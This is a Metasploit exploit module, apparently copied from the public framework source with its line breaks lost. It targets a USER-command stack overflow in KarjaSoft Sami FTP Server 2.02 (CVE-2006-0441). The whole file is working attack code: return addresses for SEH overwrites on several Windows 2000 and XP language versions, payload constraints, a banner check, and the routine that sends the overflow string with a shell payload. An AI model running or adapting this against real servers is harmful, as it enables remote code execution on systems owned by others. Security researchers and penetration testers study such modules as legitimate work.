## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'KarjaSoft Sami FTP Server v2.02 USER Overflow', 'Description' => %q{ This module exploits the KarjaSoft Sami FTP Server version 2.02 by sending an excessively long USER string. The stack is overwritten when the administrator attempts to view the FTP logs. Therefore, this exploit is passive and requires end-user interaction. Keep this in mind when selecting payloads. When the server is restarted, it will re-execute the exploit until the logfile is manually deleted via the file system. }, 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Stance' => Msf::Exploit::Stance::Passive, 'References' => [ # This exploit appears to have been reported multiple times. [ 'CVE', '2006-0441'], [ 'CVE', '2006-2212'], [ 'OSVDB', '25670'], [ 'BID', '16370'], [ 'BID', '22045'], [ 'BID', '17835'], [ 'EDB', '1448'], [ 'EDB', '1452'], [ 'EDB', '1462'], [ 'EDB', '3127'], [ 'EDB', '3140'] ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', }, 'Platform' => ['win'], 'Privileged' => false, 'Payload' => { 'Space' => 300, 'BadChars' => "\x00\x0a\x0d\x20\xff", 'StackAdjustment' => -3500, }, 'Targets' => [ [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll ], 'DisclosureDate' => 'Jan 24 2006')) register_options( [ Opt::RPORT(21), ], self.class) end def check connect banner = sock.get_once(-1, 3) disconnect if (banner =~ /Sami FTP Server 2\.0\.2/) return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit connect sploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret) login = "USER #{sploit}\r\n" login << "PASS " + Rex::Text.rand_char(payload_badchars) sock.put(login + "\r\n") handler disconnect end end